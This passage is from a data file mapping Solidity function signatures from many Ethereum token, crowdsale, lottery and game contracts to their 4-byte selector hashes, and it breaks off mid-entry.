"acceptCounterStack(bytes32,bytes32)": "0x24b77f05", "cancelCounterStack(bytes32,bytes32)": "0xb6ef78c2", "cancelStack(bytes32)": "0xe9db787b", "submitCounterStack(bytes32,uint256,uint256,uint256,uint256,uint256)": "0x29a40403", "submitStack(uint256,uint256,uint256,uint256,uint256,bool)": "0xed861328", "getStack(bytes32)": "0xa716144a", "stackOwner(bytes32)": "0x086013c0", "buyPack(uint256)": "0xdc45bfb3", "mintPack(uint256,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32)": "0x3791792a", "_mint(bytes32)": "0x6225924e", "mintBatch(bytes32,bytes32,bytes32,bytes32,bytes32,address)": "0xdd59c954", "mint(bytes32,address)": "0x293c6a3a", "setSlammerTime(address)": "0xf6621121", "Cryptogs()": "0x0ddf0bfd", "setIpfs(string)": "0xc31fa083", "NFT()": "0x7c0b8de2", "ElementToken(string,string,uint256,uint8)": "0x55923cc5", "getSumOfValues(uint256[])": "0x3bfffc49", "getTokensSold()": "0xee7c0db0", "terminateIco()": "0x2fd4ec28", "shortenDeadline(uint256)": "0x680a50cb", "extendDeadline(uint256)": "0x389b7533", "unpauseICO()": "0x63d177e6", "withdrawUnsoldTokens(address)": "0x72f57f1f", "withinPeriod()": "0x063575de", "processOffchainTokenPurchase(address,uint256)": "0x9b4b2d77", "changeBonus(uint256)": "0xc1ff808d", "changeTokenPrice(uint256)": "0xfbc94f24", "activateMainIco()": "0x90753533", "activateSecondPreIco()": "0x5b511030", "setTokenAddress(address)": "0x26a4e8d2", "drawLottery(uint256)": "0xe303a92b", "lotteryBalance()": "0xb2288649", "getAllDividends()": "0x1a6becd6", "Rappo()": "0x6cbad471", "setInstructions(string)": "0xf5738bcd", "getMyShrimp()": "0xc2127e03", "EtherFarmDevSim()": "0x5ef652ad", "getRefund()": "0xb2d5ae44", "buyTickets()": "0xc8199826", "resetRaffle()": "0x6d99f652", "Ethraffle()": "0x6a368486", "TokenERC20AC(uint256,string,string)": "0xad319bab", "put(uint256,string,string)": "0x3db8493a", "LCCToken()": "0x08a47243", "BlocksToken()": "0x005bb714", "releaseLockedBalance(address)": "0x3090bef7", "UserMinMaxCrowdsale(uint256,uint256)": "0xba44bc0b", "getInvestorsFee()": "0x22ed96a0", "addInvestors(address[],uint256[])": "0x249eae4d", "authenticate(string,bytes)": "0xe006997c", "deposit(string)": "0xa26e1186", "newAccount(string,bytes)": "0x0c1a972e", "checkAccount(string)": "0x979af14d", "DDEToken()": "0xd2254db0", "multiTransferFrom(address,address[],uint256[])": "0xcb31b6cd", "_computePublisherCut(uint128)": "0x2464a69f", "purchaseDigitalArtSellingItem(uint256)": "0xf3c156f3", "cancelDigitalArtSellingItem(uint256)": "0x06f4f7de", "addDigitalArtSellingItem(uint256,uint128)": "0x8b2a9606", "mintDigitalArt(string)": "0x86f1f2d4", "InitialArray()": "0x9c9ecedb", "commissionCheck(uint256[],uint256[],uint256[],uint256)": "0xa1158c43", "acceptOffer(address)": "0xb6261d0a", "verdictExecuted(address,bool)": "0xf171ba5d", "withdrawOffer()": "0xaa352ca4", "payCommission()": "0xb30779b1", "dealsGetter(address,uint256)": "0xab2a6dc1", "Pacul()": "0xee68edad", "HoneyToken()": "0x34083a28", "CSCS(address)": "0x7607422a", "NeptaToken()": "0xef538593", "Battle7oken()": "0xb3f5849f", "SingularityTest4()": "0x387e7bb4", "voteToResult(uint256)": "0x18bffce9", "setBetEndTime(uint256)": "0xb84391de", "getSingleBetItemCount(uint256)": "0xc8fe2065", "getProfit(uint256)": "0xa91b2e9f", "getPlayerVoteRewards(address,uint256)": "0x3b5251b7", "getPlayerWinning(address,uint256)": "0x35eb702f", "getPlayerProfit(address)": "0xce5e13aa", "addToAffiliate(address,uint256)": "0x8f112370", "calculatePositionProfit(uint256)": "0x69a4eda5", "updateProfit(uint256)": "0x652918bc", "buyPosition(address,uint256)": "0x4bf899a3", "setPrizeEndTime()": "0xa4a5e241", "Pitcheum()": "0x7dc7f7c4", "setStartTimeStamp(uint256)": "0x94996680", "setWeiRaisedInPresale(uint256)": "0x68a6b26b", "grantTokensCommonPool(address,uint256)": "0x3464e4da", "grantTokensAdvisors(address,uint256)": "0x89ea770a", "setHardCapEther(uint256)": "0x7338faba", "setRestrictedWallet(address)": "0x18af26fe", "setHardwareWallet(address)": "0xaf079dec", "unBlockAddress(address)": "0x5bfd1ab8", "Koplak()": "0xe5ed44c2", "declareWininingFighter(address)": "0x4b06e1c7", "addBet(uint256,address)": "0xb7acdca6", "checkValidFighter(address,address)": "0x778639cb", "addFighter(address,address)": "0x27d93a70", "getTotalBettersForFighter(address,address)": "0x0e1c6491", "transferMoneyToOwner()": "0x6889d646", "changeState(uint8)": "0x268f1153", "PPGT()": "0xa1ffba04", "getDNI()": "0xa00b603c", "assignDNI(uint256)": "0x9da2b791", "sendEthToContract(address)": "0xd6efb030", "checkTx(string)": "0x4ad6f9f3", "getETHback()": "0x8b9fae3f", "Calculation(string,string,string,string,address)": "0x85766cc3", "NobelToken()": "0xc336e7fb", "setKYC(address,uint256,uint8,uint256)": "0x43bf74ef", "nationalitiesOf(address)": "0x17324543", "kycLevelOf(address)": "0x02a2c88f", "expireOf(address)": "0x9117e32e", "distributeMinting(address[],uint256[])": "0x02c85991", "SOVREN()": "0x05feb950", "prenesiKovance(address,uint256)": "0x7f2c1633", "Initiate()": "0xd3dbc861", "kjhcoin()": "0x2a6c7757", "Marko()": "0x2075281c", "changeTeamWallet(address,address)": "0xcddb523b", "becomeRenown()": "0x4d3f0a6e", "contribute(bytes32)": "0x89cc81c1", "refundMe(address,uint256)": "0xaf448721", "Novatore()": "0x8107b269", "NSEToken()": "0xf694c4be", "isParticipating(uint256,address)": "0xc85bb02a", "canJoin(uint256)": "0x5987e370", "gameStarted(uint256)": "0x0904cb57", "getParticipantName(uint256,uint256)": "0x30d07d61", "getParticipantCount(uint256)": "0x86ae5fec", "getStartBlock(uint256)": "0x01b2320e", "getTeamB(uint256)": "0x3fbffca6", "getTeamA(uint256)": "0x3f6c4a1b", "joinGame(uint256,address,string)": "0x7ae046d5", "newGame(uint8,string,string,bytes32)": "0x46be6f87", "FredToken()": "0x09bb317d", "abiDecodeRegister(bytes)": "0xefbbe160", "slashUsername(bytes)": "0xcbaedd3c", "registerUser(address,bytes32,address,bytes32,bytes32)": "0x68ad1412", "migrateRegistry(uint256)": "0x98f038ff", "migrateUsername(bytes32,uint256,uint256,address)": "0x80cd0015", "getAccountOwner(bytes32)": "0xaacffccf", "withdrawWrongNode(bytes32,address)": "0xafe12e77", "withdrawExcessBalance(address,address)": "0x307c7a0d", "dropUsername(bytes32)": "0xf9e54282", "updateRegistryPrice(uint256)": "0x860e9b0f", "migrateDomain(uint256,bytes32)": "0x2b1e27f1", "moveAccount(bytes32)": "0x6780b32e", "slashInvalidUsername(bytes,uint256)": "0xd7a5f278", "slashReservedUsername(bytes,bytes32[])": "0xf9a8e898", "slashAddressLikeUsername(string)": "0xc04de318", "slashSmallUsername(bytes)": "0xf484e827", "updateAccountOwner(bytes32)": "0x32e1ed24", "register(bytes32,address,bytes32,bytes32)": "0xb82fedbb", "kilo()": "0x53214e5a", "claim(bytes32,bytes32,uint8)": "0xca96d7fc", "StoreProofOfUplinePaid(address,address,address,address,address,address,address,uint256)": "0x345607ab", "createTokenUri(string)": "0x6201d683", "create(address,address,address,address,address,address,address,string,string,string)": "0x6be24a47", "addEditTokenFee(bytes8,uint256,uint256)": "0x56522390", "getFee(bytes8,uint256)": "0x787dc9f1", "getWalletAddress(bytes8)": "0x31c05b8f", "addEditwalletContractAddress(bytes8,address)": "0x1c152982", "getOrderbookLength()": "0x629fb53d", "getSaleOrderSeller(uint256)": "0x295e1421", "getSaleOrder(uint256)": "0xfa5c0c70", "getSaleOrdersBySeller(address)": "0xaee2dbbf", "balanceOf(bytes8,address)": "0xa86c938b", "refundToken(bytes8,address,uint256)": "0x66c42517", "withdrawToken(bytes8,address,uint256)": "0x0741dc1e", "transferToken(bytes8,address,uint256)": "0xb581b725", "getTotalReqAmt(uint256[],uint256[])": "0x6a5a3625", "placeBuyOrders(uint256[],uint256[])": "0x15f06ede", "placeBuyOrder(uint256,uint256)": "0xee36d4ab", "cancelSaleOrder(uint256)": "0xb17c6ab8", "placeSaleOrder(bytes8,bytes8,uint256,uint256,uint256)": "0x2b151096", "Transwave()": "0x0b57adc0", "RobaToken()": "0x534d5ce3", "redits()": "0xe3419202", "getAvailableTokenCount()": "0xd5370904", "Redeem200AFTK16SeptSandbox()": "0x3cb0b51b", "BoxTrade()": "0x74d5f2aa", "setHighScore(uint256)": "0x9271b997", "getHighScore()": "0x3824ea31", "fund(uint256,address)": "0xeee92395", "netherToken()": "0x4e1a150b", "create(address,address,address,address,address,address,address,string,string,string,string)": "0x9942aa4d", "KOREKCHAIN()": "0xba575a39", "PUBGtoken(uint256,string,string)": "0x463cde9e", "unblockTokens(address,uint256)": "0x9b267540", "inflateToken(address,uint256)": "0x5f1b46ab", "Bosscoin()": "0x64a640ef", "ERGOIN()": "0x0b11a6e3", "_terminateSchedule(address)": "0x4b03a15e", "terminateSchedule(address)": "0x2f17a466", "_createSchedule(address,uint256,uint256,uint256,uint256,uint256)": "0x3b49c216", "createSchedule(address,uint256,uint256,uint256,uint256,uint256)": "0x5395dbb1", "CountOfAlastayaToken()": "0xcfdd7557", "EGGCOIN()": "0x05bccd09", "contributionsByIntel(uint256)": "0xae5c37fd", "getIntelsByProvider(address)": "0xeb6443a3", "getAllIntel()": "0xd6680a69", "getIntel(uint256)": "0x0c03348d", "proxy(address,address,uint256,uint256)": "0x241de9e9", "setParetoToken(address)": "0x50e7dde2", "create(address,uint256,uint256,uint256,uint256)": "0xf9b6b0c4", "MYSUPERTOKEN()": "0xb8657988", "HetherToken()": "0xf8ad69a8", "getnum(address)": "0x0ca1988b", "getstr()": "0xab5170b2", "getflag()": "0x4804a623", "create(address,address,address,address,address,address,address,string,string)": "0x938f3cc4", "splTransferFrom(address,address,uint256,uint256)": "0x5bba3307", "JetherToken()": "0x3fc8ca58", "specialTransfer(address,uint256,uint256)": "0xdab8a18b", "ssword(string)": "0xe391b3d1", "add_numbers(uint256)": "0xbf15a645", "FrogDaruma(address,address,address,uint256,uint256,uint256)": "0xd18c5da7", "EtherCash()": "0x45f45449", "sell_(uint256)": "0x3c70bd42", "depositNoRef()": "0xa55d260d", "mySavings()": "0x46272a6d", "myHalfDividends()": "0x3619cd99", "GenerateFortuneCookie(uint8)": "0x8fc3c33b", "create(address,address,address,address,address,address,address,uint8,string)": "0xcdef9423", "LjwStandardToken()": "0xfba84b2a", "fuoco()": "0x0e18ea3c", "KanadeCoin()": "0xba953bc8", "getValueTip(uint256)": "0x403b3757", "removeGameInfoFromArray(uint256)": "0x826a49c9", "destroyGame(uint256)": "0xd81dd9f7", "closeMyGame(uint256)": "0x0fa87b15", "joinGameAndBattle(uint256,uint256)": "0x8e984ccd", "createGame(uint256)": "0x48e837b9", "addTipForDeveloper(uint256)": "0xb65ddf2b", "HostingIcos()": "0x93d90a4e", "registerBarcode(bytes9,bytes3,string,string,bytes19)": "0x698d67aa", "getAllowance(address)": "0xeb5a662e", "getLatestWhitepaper(address)": "0x8d447e39", "getWhitepaperAt(address,uint256)": "0x943814f0", "SetApplicant(string,uint32,uint256,int256,string)": "0xf1c6aeb7", "BcengCoffeeToken()": "0x9e6992b5", "getWinRate(address)": "0x914a1e76", "CoinX()": "0xc722e462", "PardusNetwork()": "0xbea3c8b3", "CitrusCrowdsale(address,address)": "0x192b7700", "getLastAwardInfo(uint256)": "0x0b1d366d", "getRoomBalance(uint256,uint256)": "0x6b3ce49b", "getCurRoundInfo()": "0x4146e099", "getUserTicket(uint256)": "0x1859c8e2", "got()": "0xde2111e2", "IsGot(uint256[],uint256[])": "0x1830d69d", "getsecond(uint256[])": "0xcd12efc8", "getthird(uint256[])": "0x3ed3d6a6", "getTicketCode(uint256)": "0x2ab0be77", "getWinNumber()": "0x6f2f7a57", "query(uint256)": "0xafdac68d", "updata(uint256,uint256)": "0xe3a99d2b", "resetArray()": "0xfc177bd6", "choose(bytes32,bool)": "0xf65f5eeb", "execute(bytes32)": "0xe751f271", "executeRecursive(address,address,bytes32,int256)": "0xf2ea83e6", "join(bytes32)": "0xad677d0b", "own(bytes32)": "0xa248de8f", "issueFor(bytes32,address)": "0xc6c4bf44", "createFincontract(bytes32)": "0xb334fd07", "createFincontractWithParties(address,address,bytes32)": "0xedea3e5d", "After(uint256,bytes32)": "0x4bf003fa", "Before(uint256,bytes32)": "0x6d2570fe", "At(uint256,bytes32)": "0xe0619859", "Timebound(uint256,uint256,bytes32)": "0x6807b84d", "If(address,bytes32,bytes32)": "0x86a3c902", "ScaleObs(address,bytes32)": "0x19d9c8df", "Scale(int256,bytes32)": "0x86a91ab4", "Or(bytes32,bytes32)": "0x490f611e", "And(bytes32,bytes32)": "0xfe26cdeb", "Give(bytes32)": "0x6ce066af", "Zero()": "0xf4560403", "getFincontractInfo(bytes32)": "0x7098e670", "getDescriptionInfo(bytes32)": "0x06b77972", "isRegistered()": "0x22366844", "FincontractMarketplace()": "0x490cce74", "EstateTransactions(string,string,string,address,int256)": "0x056ed205", "tranfer(address,uint256)": "0xc610bb07", "WillCoin()": "0x16ddcef5", "isTimePassed()": "0x32a6baf6", "AIToken()": "0xe4e3466a", "ConstantConfig(uint256,bool,bool)": "0x1a4be6ff", "getQuotaCheck()": "0xb4a0e24c", "getPermissionCheck()": "0xdd12b51f", "getBondRemainingToBePaidOut()": "0xe4a36a77", "getDisputedPayoutDistributionHash()": "0x04ea4a57", "getBondHolder()": "0x68fe4405", "run(uint256,bytes)": "0x220eb9b6", "Incomplete()": "0x2bff5fc4", "immediateRefund()": "0x0e70f147", "changeBlocksToExpire(uint256)": "0x77ce4fd1", "changeLOT(uint256)": "0x5c0286c0", "changeMargin(uint256)": "0x2142adc9", "payAndHandle(uint256,address,uint256)": "0x85c1057b", "exercise(uint256)": "0xb07f0a41", "priceUnitFix(uint256)": "0xa4464252", "applyLOT(uint256)": "0xa4978a15", "findOptionId(address)": "0xab73f08e", "goShort()": "0x9ff394a8", "goLong()": "0x11bbb155", "newOption(address,uint256,bool)": "0xd5bd3443", "getBTCETH(uint256)": "0xd8f342be", "getPrices(uint256)": "0x91492956", "finalOptions()": "0x3ea252eb", "addApproval(address,address,uint256,uint256)": "0x70cddf74", "USDZAR(uint256)": "0x36489775", "accountInformation(address)": "0x16192d2a", "disableTransfers()": "0x3a67a0f6", "allowTransfers()": "0x2185810b", "reopenDO()": "0x617f171f", "changeAdmin(address,address)": "0x1acfd02a", "paybackContribution(uint256)": "0x4a733ded", "registerVIP(address,address,uint256)": "0x4ca6fcfc", "fullTransfer(address)": "0x376fc790", "acceptTermsAndJoinDXF()": "0xe0b3c49c", "DXF_Tokens()": "0xa8f02555", "addAddressToWhiteList(address)": "0x9244f496", "removeContractFromWhiteList(address,uint256)": "0xd8fbbf31", "getAddressWhiteList()": "0xc6f5d91f", "isAddressWhiteListed(address)": "0xad23de63", "isEarlyBird(address,address)": "0xe180dbbd", "getBonus(address,address,uint256)": "0xf8956a67", "updateBonuses(address,address,bool)": "0x711d4407", "earlyBirds()": "0x98cef4bd", "updateWhiteList(address,address,bool)": "0x485e35d3", "updateEndsAt(uint256)": "0x5ce83f70", "updateTokenStore(address)": "0xdf18e215", "updateTokenContractAddr(address)": "0xf2a6517f", "updateMultiSig(address)": "0xf27715b4", "isWhiteListed(address,address)": "0xa10cda99", "exchnageRate()": "0xb80f3532", "fundingRaised()": "0xeb04c36c", "investedAmoun(address)": "0xef4d6149", "investments()": "0xec8a2c88", "distinctInvestors()": "0x8def1d3b", "fundingEndsAt()": "0x1ce26faa", "fundingStartAt()": "0x9dcb0f55", "tokenStoreAddress()": "0x648f4f0f", "tokenContractAddress()": "0x82edaf94", "multiSigAddress()": "0x1516def7", "Crowdfunding()": "0x4686753d", "checkOnlyContractOwner()": "0x6156e892", "withdrawnTokens(address[],address)": "0xd8f9659b", "ReserveTokensHolder(address,address,address)": "0x7c372277", "isValidCap(uint256,uint256)": "0x8edc4f8f", "computeCap(uint256,uint256)": "0xb40e4bec", "setCommunityMultisig(address)": "0x6b5bbf5f", "setAragonDevMultisig(address)": "0xd0a7b467", "deployNetwork(address)": "0xa1a5d118", "doFinalizeSale(uint256,uint256)": "0xdc30e253", "finalizeSale(uint256,uint256)": "0xce5c4fd8", "revealCap(uint256,uint256)": "0xe2d5d11b", "restartSale()": "0x74711285", "minWithdrawalCoolingPeriod()": "0x683d4a4b", "addr_Saddlery()": "0xa802257d", "sourceToken()": "0x5f8aaa69", "satoshiMood()": "0xc14fbd64", "assignmentsClosed()": "0x56979da7", "affiliateBonusPercent()": "0xc4a13f23", "isLpStart()": "0x2e3fa349", "noShares()": "0x27c7ff61", "stageOneSupply()": "0xe730e87a", "exchangeRatePreIco()": "0x3c6a71f7", "isTokenExchange()": "0x641f3b46", "tokensWeiRaised()": "0xe2496d5b", "theTurn()": "0x277576ca", "claimedFlag()": "0x44e2adeb", "SupportFund()": "0x1b4c5a10", "currentCoinsCreatedPercentage()": "0x71beae97", "lockTime()": "0x0d668087", "totalNormalContributorIds()": "0xa6661901", "forceToken()": "0x5addc540", "longTermTokens()": "0x1fa13a61", "closedSaleWallet()": "0xbf1c8016", "CandyBox()": "0x30f20847", "appWallet()": "0x3876e05e", "releasedRoundCount()": "0x9af25d07", "SECCoin()": "0xb9c53d04", "stageOneEnd()": "0xcf00c197", "_badgeTotalSupply()": "0x3a573e02", "marker()": "0x3acddfc1", "tokensAreFrozen()": "0xca67065f", "lockTokenSupply()": "0x44447f47", "investmentGateway()": "0x3c17b656", "foundationFundTokenCountInWei()": "0xb4114165", "secondPartOfTeamTokensClaimed()": "0x8bcba45a", "MIN_CONTRIBUTION_ETH()": "0x25fdb725", "REPO_APP_NAME()": "0x023d6c03", "kittenTalk()": "0x3f3c212d", "trusteeContract()": "0xbb133331", "invoke()": "0xcab7f521", "baseMineTokenAmount()": "0x7614e727", "cashierAddr()": "0x51fafd95", "RESERVE_EXCHANGE_SHARE()": "0x5bb0fa46", "godAddress()": "0xf8900ddd", "START_TOKENS()": "0x1aa7655c", "icoTimeBonusPhase1End()": "0x7ebdf57d", "tokensPerMicroEther()": "0x43bff765", "priceICO()": "0xd63e7cc1", "MinimumPoStokens()": "0x198b5d0d", "burnMin()": "0x02d3fdc9", "preCrowdsaleTokensWallet()": "0x92829174", "callerAllocationStartBlock()": "0xde0cf58b", "ownerWithdrawAll()": "0xe0d5af94", "allOfferingSupply()": "0x5c3cd827", "currentHunterNumber()": "0xfc5eb846", "estimatedWeight()": "0x473533e6", "mintPriceOffset()": "0x1b517663", "burnPercentage1000m()": "0x0b4bb61f", "unauthorizedAddress()": "0x94d2b21b", "initAmount()": "0x54999f6d", "privateLockedAmount()": "0x839a01be", "EmergencyUnPause()": "0x9d119a4e", "maximumTokenAmount()": "0xc80743c5", "Funding_Setting_cashback_duration()": "0x5e593cd3", "returnPercentage()": "0xa8f6d84d", "devTokensPercent()": "0x3d126a45", "cryptiblesAuctionContract()": "0x1c296b34", "currentBetNumber()": "0x9a2160a7", "ADMIN()": "0x2a0acc6a", "totalplayers()": "0x1cc13dff", "funds_claimed()": "0x2aefb7c5", "privatePreSale()": "0xbf58aad8", "inject()": "0x90d4bcc0", "boards()": "0xc1a2a8f4", "INDI()": "0x0cfd0a0d", "withdrawPayout()": "0x06c0e841", "amount_stages()": "0x9c1230c1", "maxCreatorWithdraw()": "0x59849d30", "TOKEN_PRESALE_CAP()": "0xeb75dc03", "addrAirDrop()": "0x27773ba2", "pStartBlock()": "0xfbde8ad4", "endTimeinMinutes()": "0x3e18e78e", "userGrowsPoolSupply()": "0x8d7e7958", "eth_to_usd()": "0x2cce0c60", "percentageHumanityFund()": "0xcfa9fa85", "lastPurchasePrice()": "0x8207b07d", "prTokens()": "0xdf7dbd70", "eventsAdmin()": "0xd8b163d0", "memberProfitShare()": "0x3123bd9d", "tixPresaleDeposit()": "0xd2a79e57", "zRefundAllPlayers()": "0x2e33178a", "producedDiamondCaps()": "0x0e53bf67", "tokensPerTier()": "0xa8d5652e", "getAddressLength()": "0x3b3672bd", "DEFROST_INITIAL_PERCENT_OWNER()": "0x0dcc59e6", "increaseMaxContribTime()": "0x4dbb4da5", "rInFp()": "0x436f64ac", "ROUND_7_PRESALE_BONUS()": "0xcaafa055", "getArrayLength()": "0x0849cc99", "BTWO_CLAIM_PERCENT()": "0x8c12c35c", "hardcapReached()": "0x5e6911af", "isDistributionInProgress()": "0x60d3e4c5", "performRead3()": "0xee82ea2d", "performRead2()": "0x4c17b322", "performRead1()": "0xc14c7bd7", "getHint(int256,uint256)": "0x7078f424", "performInit()": "0x93791262", "performFetch()": "0xd7be8ceb", "getImmed(bytes32)": "0xb4f5d282", "handlePointer(uint256,int256,uint256)": "0x437257bd", "writeStuff(uint256,int256,uint256)": "0xa052eae4", "writePosition(uint256,int256)": "0xb8d94039", "makeMemChange2(uint256,uint256,uint256,int256)": "0x1833198f", "makeMemChange1(uint256,uint256,uint256,int256)": "0xdd9e4094", "readFrom(uint256,int256)": "0x92a4cc25", "readPosition(uint256,int256)": "0xcbae0163", "transferAll(address)": "0xa3a7e7f3", "win()": "0x473ca96c", "initBank()": "0xfae21f0a", "Bank()": "0x4e41108d", "blocktubeTransfer(address,uint256)": "0xcfa5d53b", "unpublish()": "0x5c31f93b", "publish()": "0x075d4782", "blocktubeClip(string,uint256,uint256,address)": "0x88873eea", "tag(address,uint256)": "0xd42d8eed", "pay(address,uint256)": "0xc4076876", "setHeir(address,uint256)": "0x14c74834", "Deviser()": "0xa12da89f", "ProxyERC223()": "0x8e391cb2", "proxyPayable(address,string,string)": "0x32e54f72", "proxy(address,string,address,uint256)": "0x9927482d", "isRedeemable(address)": "0x76db6c8d", "transferCustodian(address,address)": "0x6d5b0f6f", "receiveFromVendor(address,bytes32)": "0x67d13f27", "CustodianInterface(address)": "0x36851957", "addThing(string,bytes32,bytes32,string)": "0x0a866f3a", "permitted(address)": "0x6cc301e3", "_saveVerification(address,address,uint32)": "0x68e7e309", "_requestExistsReverse(address,address)": "0x2172ac5a", "_requestExists(address,uint32)": "0x0034f529", "_deleteRequest(address,address)": "0x17415d50", "_saveRequest(address,address,uint32)": "0x8142453f", "revoke(address,address)": "0xdcf3fb2a", "verify(address,address)": "0x2c2146aa", "removeRequest(address,address)": "0xfe8806f5", "getRequest(address,address)": "0xbfd74534", "request(address,uint32)": "0xd9019530", "AddressOwnershipVerification()": "0x32a7d7c2", "doSucceedingApprove()": "0xb19faed8", "doSucceedingTransferFrom()": "0xd7228bb5", "doSucceedingTransfer()": "0x56b2c5bb", "doFailingApprove()": "0x6573ee1e", "doFailingTransferFrom()": "0x50930ca5", "doFailingTransfer()": "0xafa03ac9", "SafeERC20Helper()": "0x9ca5f4a7", "claimRefund(address,address)": "0x3d66da8e", "ownerActivateToken()": "0xf57be85d", "ownerSetVisible(string,string)": "0xd8a119b9", "ownerSetOverride(address,address,bool)": "0xab731fd6", "UnityToken(uint256)": "0x43463c3a", "quarantine(address,address[],uint256[])": "0x962ba36f", "pausePayment()": "0x27b96df7", "setPayment(address)": "0x9ab06fcb", "EscapeHatch()": "0x16ed36fb", "updatePrice()": "0x673a7e28", "ExampleContract()": "0xc072dcf3", "emergencyRelease()": "0x1b393b9a", "emergencyPause()": "0x51858e27", "fireOnOfferingChanged(uint256,bytes32,uint256[])": "0xbf8554ff", "addOffering(address,bytes32,address,uint256)": "0x12b97812", "OfferingRegistry(address)": "0x93b1d4c7", "getValidations()": "0x12fd67ba", "countValidations()": "0x33ac2009", "addValidation(bytes32)": "0xb38b2261", "localsAvatar(bytes32,address,bytes32)": "0xe99392c0", "set(int256)": "0xe5c19b2d", "enableCirculation()": "0xf83c4f82", "channelTimeout()": "0x2ef2d55e", "closeChannelEcrecover(bytes32,uint8,bytes32,bytes32,uint256)": "0x19dc2525", "closeChannel(uint256)": "0x175b0284", "PaymentChannel(address,uint256)": "0x5c85267b", "testCloseChannel()": "0x2b321633", "closeChannel(address,uint256)": "0x01d42a9c", "createPaymentChannel(address,uint256,uint256)": "0xc30a990a", "getByAlias(bytes32)": "0x94d2ca12", "addAlias(bytes32,address)": "0x608e7fa6", "testPayout()": "0xc413fdf3", "testPayTeam()": "0xee8c4c6d", "testCheckRokSold()": "0x5e71c7fa", "testCheckRokBounty()": "0xaa80eec8", "testPayTokens()": "0xcb724422", "testCheckRokTeam()": "0xa2bc0e31", "testBonus()": "0xaaa08e9b", "numberOfContractors()": "0xff77898a", "order(uint256,uint256)": "0x33863ed9", "submitProposal(address,uint256,uint256)": "0xf98b26a9", "newProposal(address,uint256,string,bytes32)": "0xcae8e284", "updateProjectDescription(string,bytes32)": "0x16928a44", "updateRecipient(address)": "0xfeec756c", "closeSetup()": "0x48f134f6", "cloneProposal(uint256,string,bytes32,uint256,uint256,uint256,bool)": "0x1a1ceb11", "proposalChecked(address,uint256,uint256)": "0xf3bf6b73", "_getFeeAndNetAmount(uint256)": "0xbab95dba", "isOpen()": "0x47535d7b", "getReleaseAmount()": "0x5f8a7eab", "releaseSupply()": "0xa0893ef2", "TQXToken()": "0x917b4f8b", "Constructor()": "0x8a3c44a5", "addSafe(uint256,uint256)": "0x85b51737", "subSafe(uint256,uint256)": "0x32d2e55c", "divSafe(uint256,uint256)": "0x91c23928", "mulSafe(uint256,uint256)": "0x60699026", "allocateTokens(address[])": "0x484c8675", "allocateTokens(address)": "0xcabfd1bf", "HumanStandardToken()": "0x44566fe0", "unlockForever()": "0x75be5846", "distributeAirdrop(address[],uint256)": "0x94594625", "transferAdminship(address)": "0x5be7cc16", "CHN()": "0xd6ec0065", "admined()": "0xa6515a98", "mintTokens(uint256)": "0x97304ced", "blacklistAccount(address,bool)": "0x2d5a5d34", "MorphToken()": "0x330f412b", "ERC20(uint256,string,string)": "0xf9f03556", "MANHATTANPROXY4THST()": "0x0fe3c10d", "TokenFactoryAirdropCoin()": "0xae813ebb", "withdrawEther(uint32)": "0x4a1fe393", "addMinerTokens(uint32,address[],uint32[])": "0xf93ee24c", "NewToken(uint256,string,uint8,string)": "0xb2357392", "GumToken()": "0xd7872745", "setExchangePrice(int256)": "0x76a85d54", "safeWithdrawal(address)": "0x6fd42b32", "exchange()": "0xd2f7265a", "HashnodeTestCoin()": "0x3e20f7fb", "withdrawFromReserve(uint256)": "0x0a8bcdb9", "availableReserve()": "0x5e9f9613", "PoetToken()": "0xc2fa8b2d", "withDecimals(uint256,uint256)": "0x3daf31b5", "transferERC20Token(address)": "0x56d7c2c8", "getReservedPercentageDecimals(address)": "0x45e7e140", "getReservedPercentageUnit(address)": "0x3d0acdaa", "getReservedTokens(address)": "0x612544b3", "areTokensDistributedForAddress(address)": "0xb4ecb847", "isAddressReserved(address)": "0x95fe6f1d", "finalizeReservedAddress(address)": "0x6ffc22b8", "external_call(address,uint256,uint256,bytes)": "0x7ec509c4", "Cloudeb()": "0x41d1da19", "eddToken()": "0x1a7303de", "TokenERC20()": "0x1978a87b", "CryptoKotik()": "0x861e5d6a", "PreCrowdsale(address,address)": "0x0e597ed9", "destroyFrom(address)": "0x05398302", "TKRPToken()": "0x3fcead58", "singleValueAirDrop(address[],uint256)": "0x89f21090", "multiValueAirDrop(address[],uint256[])": "0xd628ecd7", "AWAXToken()": "0x159a3c33", "TGMtoken()": "0xadaa19cc", "contribute(address,address,uint256,uint256)": "0x3749ea8e", "presalePurchase(address[],address)": "0xb6b32c07", "initializeCompanyTokens(uint256)": "0x3bf17f75", "W0keAFCrowdsale(uint256,uint256,address,address,address[])": "0x2014e1fb", "W0keAFPresale(uint256,uint256,uint256,address)": "0x40ca0f05", "bet1000_1eth()": "0xa5eceaf1", "getCurHash()": "0x3b666e48", "addguess(uint256)": "0xccd1a621", "getBettingStatus()": "0x179dfbf3", "getBettingStastics()": "0x479e393c", "getLotteryMoney()": "0x7842aded", "getDeveloperFee()": "0x77482b18", "findWinners(uint256)": "0x307f6b12", "stringToUint(string)": "0x1bd95155", "bet1000(uint256)": "0xff1b01a6", "setPrice3(uint256)": "0x4ea412f4", "setPrice2(uint256)": "0xccf27a4e", "setPrice1(uint256)": "0x7316453e", "setCreator(address)": "0x3f516018", "ETXCrowdsale()": "0xd5d55931", "lockOver()": "0x9b7faaf0", "isValidAddress(address)": "0x003f07fa", "destroyAllTokens(address)": "0xd3e91a98", "invest(address,uint256)": "0xb9b8c246", "airDrop(address,uint256)": "0x045f7850", "setairDropManagerLimit(uint256)": "0xfc26fe01", "setAirDropManager(address,address)": "0x995b129f", "setAirDrop(bool)": "0xa2368e11", "setSale(bool)": "0x1d2e5a3a", "setPreSale(bool)": "0x0d95ccc9", "KayoToken(address,address,uint256,string,uint8,string,bool)": "0x7f3ad651", "finalizeUpdateState()": "0xda128527", "lastTokens(address)": "0x44cb1c33", "buyCoins(address,uint256)": "0x9440f01f", "buyCoinsUpdateState(uint256)": "0x40dca307", "buyTokensUpdateState()": "0x6bed09be", "refundAmount(uint256)": "0x0ce08a49", "forwardFundsAmount(uint256)": "0x306ab1ba", "UnitedfansTokenCrowdsale(address)": "0x36d1f54b", "setMigrationMaster(address)": "0x26316e58", "resetCrowdSaleAddress(address)": "0x63746113", "UnitedfansToken(address)": "0xf61adfdd", "SetupToken(string,string,uint256)": "0xb6d2a9b9", "SuMain()": "0x4f1f421b", "grantToken(uint256,address)": "0x133252a6", "multisigWallet()": "0x9075becf", "tokensBank()": "0x1f049a49", "secondLockAmount()": "0x1daee82d", "TRAC_Tokens_left()": "0xd397f861", "CancelAuction()": 